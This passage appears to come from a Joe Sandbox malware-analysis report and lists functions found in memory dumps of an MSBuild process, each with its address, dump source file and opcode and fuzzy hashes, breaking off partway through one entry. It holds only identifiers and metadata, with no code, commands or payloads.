                                                                                                                                                                                                                                                Function 072ACF48 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: bbe137b00c721305d5a0dcdfc718bae7407fe32ef5f7ce7b61d1ec62f5c181c7
                                                                                                                                                                                                                                                • Instruction ID: 21cf6cffcedca39dc1dd0d509798b9f6874c3d0fc1f590963cb6bcc74132503d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbe137b00c721305d5a0dcdfc718bae7407fe32ef5f7ce7b61d1ec62f5c181c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13011E313012129FC348DFA8E45089AB3E7FFC922531455A9E60A8B745CA31EC91CFE4
                                                                                                                                                                                                                                                Function 072AE85C Relevance: .0, Instructions: 48COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5bcb40bc87e4834767acab7852ac4e124ce6e96e811ef45ad319ca712c4c14ab
                                                                                                                                                                                                                                                • Instruction ID: 698228ee26b7eaf022ddfc6948d93ee4764199ffd059334dba9dcaec9defdc36
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bcb40bc87e4834767acab7852ac4e124ce6e96e811ef45ad319ca712c4c14ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B11DA74D10249EFDB45CF98D484A9DBBB2FF48324F298158E415AB361C771A982CB80
                                                                                                                                                                                                                                                Function 07092420 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 42bb92cbf2822e460d3b73b1754051c8458b30394cd139c650329ec17e9721ef
                                                                                                                                                                                                                                                • Instruction ID: d5769c8e123c93d9f1da0f1ab3c6042d1c384de1f1a14b898607c20d86a1eb87
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 42bb92cbf2822e460d3b73b1754051c8458b30394cd139c650329ec17e9721ef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38017DB26003199FDB10DE5AD8807BF77E5FB80320F00463ADA02C3292C660D94897A1
                                                                                                                                                                                                                                                Function 072ADE54 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 30315c4638f8ff66686c10812e16528299134573842405a802162f0f8a1c0813
                                                                                                                                                                                                                                                • Instruction ID: 02dbc7e19f70a5e17df54db6c072d77a0c153ada8b75a76f422852d151cf59d9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30315c4638f8ff66686c10812e16528299134573842405a802162f0f8a1c0813
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 621106B4A11249EFDB05CBA8D584A9DFBF2AF58314F24C158E415AB365C771ED82CF80
                                                                                                                                                                                                                                                Function 0711DBE0 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ac80347ba6eb78966f2c1a53f70345a7307391a659f1e0bd2c4127e129b1e3b
                                                                                                                                                                                                                                                • Instruction ID: 9adace362524b6085b60b9ea944c9c1b54f7dd076f91c6da6131b38fa185d53f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ac80347ba6eb78966f2c1a53f70345a7307391a659f1e0bd2c4127e129b1e3b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F50104712007099FD725DF25E88098FB7E5FF84760B008B29E44A8B625EB70FD098F95
                                                                                                                                                                                                                                                Function 07118772 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8e4370b8cce2ce76ef8caed49412b71d6169a68e654f3a4921c96ab167925aa8
                                                                                                                                                                                                                                                • Instruction ID: 920d6717c68aec6de8d6bf00a1ebe9c34e8ee359ec079143b8fa47cd21c4666e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e4370b8cce2ce76ef8caed49412b71d6169a68e654f3a4921c96ab167925aa8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 80F0C8353007015FD718DB3AD85499977EB9FCA66071980B5E602CB3B1DF70DC018750
                                                                                                                                                                                                                                                Function 071BDE60 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 75e4337b03cb61f3a1d186d4c93fca2593571f0298de48a20db05cddf7be09d4
                                                                                                                                                                                                                                                • Instruction ID: 6149e2573b5fdb4f120ff4476aedfb81ad805ebf4154f170c547ccb8d97e19fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75e4337b03cb61f3a1d186d4c93fca2593571f0298de48a20db05cddf7be09d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38012C71308600AFC728CA69E884C17BBE9FB8A320319069DF18AC77B1C725FC418B54
                                                                                                                                                                                                                                                Function 0711A7C8 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8acefb887d16af72d182a8e98cd55d14bd9aff9654c0e1581d6cd12510c1e080
                                                                                                                                                                                                                                                • Instruction ID: 4baf507f9e393415145808d925a51ded4309edd4d4640056b3bba0a8fb198d7c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8acefb887d16af72d182a8e98cd55d14bd9aff9654c0e1581d6cd12510c1e080
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 660140712007059FD725DF29E98098BB7E5FF84620B00CB29E44A8B661EB70ED058F95
                                                                                                                                                                                                                                                Function 071B78A8 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 61ceda87b6713f8e894c096dc8bde4de1828dd1766d8a05c2fee0e3a7a44eb54
                                                                                                                                                                                                                                                • Instruction ID: 33270522713f7ac7f843cdb7cd8414d3fbdef0ec54093aea5c9cd085ba03bd8c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61ceda87b6713f8e894c096dc8bde4de1828dd1766d8a05c2fee0e3a7a44eb54
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38017D60F192A64FC71A5B3CDC241BD3B66DFC225030941AFC44ACB3D2CE39990AC7A2
                                                                                                                                                                                                                                                Function 072A9EAA Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5dc8d7a25131f5dda02dc8171ad166f20a96d5ce7e2c498bebec37dfa59742e6
                                                                                                                                                                                                                                                • Instruction ID: 6e1af19164915d480201b5a21941ea7583f8c38e49d3162804815faa0e44e650
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5dc8d7a25131f5dda02dc8171ad166f20a96d5ce7e2c498bebec37dfa59742e6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11F04676724384AFCB21862AC8409E2BFE59B46310B0480B7D912C7752CA31EC04C790
                                                                                                                                                                                                                                                Function 072AD3F8 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fb898776d8de26d6cf7822e8448ea2fd32f6ffdff2c049da3d9672ce80a9888e
                                                                                                                                                                                                                                                • Instruction ID: 2dae167a52909763d6618a5dfce902ac87f9fa5ee269cb9e828b20968e88331b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb898776d8de26d6cf7822e8448ea2fd32f6ffdff2c049da3d9672ce80a9888e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3F06DB77105109BC718E279E8916EE77D7ABC85717540679E10ECB790EF28EC0683C6
                                                                                                                                                                                                                                                Function 0711A7D0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1e881ff567ca70fac36d765b0e976131bc68d8cc57fff5ee016f37dfe5664bb8
                                                                                                                                                                                                                                                • Instruction ID: 80d42fe28a6401ec795e331b8a46e9971d1fcd1bf4bb40f0356e0db9d87c463a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e881ff567ca70fac36d765b0e976131bc68d8cc57fff5ee016f37dfe5664bb8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA0121712007099FD724DF29E880D8FB7E5FF84760B008B29E44A8B621EB70FD058B95
                                                                                                                                                                                                                                                Function 0709E638 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: a205b4b269a6254cd4278a1ecacdf28849cfee2a97e167934864dd20ea18af11
                                                                                                                                                                                                                                                • Instruction ID: 44fa01617811700c19fa4dc6428655c771b6717635aae62a8070a59bf4e18f2e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a205b4b269a6254cd4278a1ecacdf28849cfee2a97e167934864dd20ea18af11
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A801D1B2310702CFCFA8CA25D400A27B3E6BFC1685B14893CD44286614DAB1FC80EF90
                                                                                                                                                                                                                                                Function 072ACD29 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 019a00251bd71f20e4eedef296994bae32e8163ef6ae7bfc1160c5cfcb4375b1
                                                                                                                                                                                                                                                • Instruction ID: 4468927c3e14136b859277c3f06c454928c52169e5f6352c5aac9c5a33bc3160
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 019a00251bd71f20e4eedef296994bae32e8163ef6ae7bfc1160c5cfcb4375b1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0F4F23007046BC304EB59E840A9ABBD6DFD4620F0586BAD5049F165EA70D94187D5
                                                                                                                                                                                                                                                Function 071B7838 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 055bf1fcc19c7d4acd6cd023a1a563fe0e37508736588be3e7747151f3cc7320
                                                                                                                                                                                                                                                • Instruction ID: e36eb56b070a6a8f0de34b3d079b51a2dc797a35373f0c73dcad11f0930c2ad6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 055bf1fcc19c7d4acd6cd023a1a563fe0e37508736588be3e7747151f3cc7320
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6F0B4B27082259F8B18DEE9B4015EA7BE5EB8417571540ABE00EC76D0EF32D941C784
                                                                                                                                                                                                                                                Function 0709F500 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e9782688a4cc0b0417e460227ec317876ef3c99c543b682dc762db03b46f820e
                                                                                                                                                                                                                                                • Instruction ID: 7655f103e3632409b74ab43e7d5811758b456863275ceef3ac433be348516186
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9782688a4cc0b0417e460227ec317876ef3c99c543b682dc762db03b46f820e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F0A931340311ABDB20CA29E848FA27BE5AB46B64F018266F655CF1E6C3A1E900DB90
                                                                                                                                                                                                                                                Function 0711AFF8 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 53bb644c46e620c2450f23c0a335975295de5c0c12ac11c559380cb5c25b5ba0
                                                                                                                                                                                                                                                • Instruction ID: be82fa8af3d1ac19dbb945129a9c7f8c8e966edbfc2e36ca65a71b59cbd27388
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 53bb644c46e620c2450f23c0a335975295de5c0c12ac11c559380cb5c25b5ba0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8F090B13093816FD3229B76E840C92BFF6EF8229031544BAD645C7652EB21EC44CB71
                                                                                                                                                                                                                                                Function 071B6F90 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0e9dc196c8b995fc863cbf92f123d3e7c77dc26d1fea3d80786d6fba986196dd
                                                                                                                                                                                                                                                • Instruction ID: 0efbba8f90a2c176eb76de23d542e023668b178c8ece9219785b35475fe51f11
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e9dc196c8b995fc863cbf92f123d3e7c77dc26d1fea3d80786d6fba986196dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9F096F66052116F9721DA49D880E9BBBAAEFE9360715862BEC1CC73C4D735EC028790
                                                                                                                                                                                                                                                Function 071B03D0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 28f61be73f0925a2a1462882ca600f00283cef3db718af7ce1510439f69d0558
                                                                                                                                                                                                                                                • Instruction ID: bc1c3000882fe8fa8f986da02b1f614e97b15fe00a2aea42eccf766feaadfce6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 28f61be73f0925a2a1462882ca600f00283cef3db718af7ce1510439f69d0558
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69F0E9F2715269BBD7364416A841FAB7B99DB89B60F05412AF8459B2C1DB30CC0286F1
                                                                                                                                                                                                                                                Function 072ABCC2 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6813207326a1bc51c5adc68fe1b2e02b56987c933444b9ecde06a539c9ac4fa6
                                                                                                                                                                                                                                                • Instruction ID: 44cb5b990d87e45402187f6e1d2c993ffaa2d3fdeac83e42f0aeccda6470ed22
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6813207326a1bc51c5adc68fe1b2e02b56987c933444b9ecde06a539c9ac4fa6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FF0C2763002009FC705E734D8508AABBF6BF8916134406AAE04ACB792DB24AC04CBD1
                                                                                                                                                                                                                                                Function 07118728 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 01209268d391d718bb41a553a4db6f06cf62d47ee8b7384fd821804492fa0f04
                                                                                                                                                                                                                                                • Instruction ID: 45b7dbb583a17a6d0e228b38d1c514ea6a54b905ba137c5e06f72adadd17f39f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 01209268d391d718bb41a553a4db6f06cf62d47ee8b7384fd821804492fa0f04
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 06F0BE32204325DFD3268A18EC80996BBE9EB4636070081A6E805CB241C732D881CBA1
                                                                                                                                                                                                                                                Function 071B8B72 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 30ce52aea0e35d6137bb931e0a3b9541d8e297db2495ce5ea57b651cb096cef9
                                                                                                                                                                                                                                                • Instruction ID: dde5589a2b21ec8a9e3b8ce0671889fb5d46d967b38e9437d1e609560b5c8bf8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30ce52aea0e35d6137bb931e0a3b9541d8e297db2495ce5ea57b651cb096cef9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3DF02BB26005149FCB308B5CD954EC6F79DEB40B20F12C016D61ADB2C1CB20FC0187C4
                                                                                                                                                                                                                                                Function 072AD408 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 08a250be211044cc4d666fa976ecee7c3d6178b3bef25a4522e8ded7881ec5cf
                                                                                                                                                                                                                                                • Instruction ID: bada9ff1a791fb9a7f1fe3ea24733c0a1581baa0a5fa1d364094f66e21c2b473
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08a250be211044cc4d666fa976ecee7c3d6178b3bef25a4522e8ded7881ec5cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 51F082B63101109B8618F379E8909AE73E7BBCC5613504679E10EDB7D0EF24BC0687C6
                                                                                                                                                                                                                                                Function 07118780 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 79decfce2456b31b4afff50b135ac70eba71ffe16d5690b3e488f3e9f05f7f37
                                                                                                                                                                                                                                                • Instruction ID: d68048b9f4b0f72ede6753cd6fbbd084b0c55a240c0e81cbce45d1aa13a1a9c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79decfce2456b31b4afff50b135ac70eba71ffe16d5690b3e488f3e9f05f7f37
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1CF0FE397106118FD748DA3ED85486977EB9FCD66131580B9E606CB370EFB0DC428B50
                                                                                                                                                                                                                                                Function 0709CFF0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
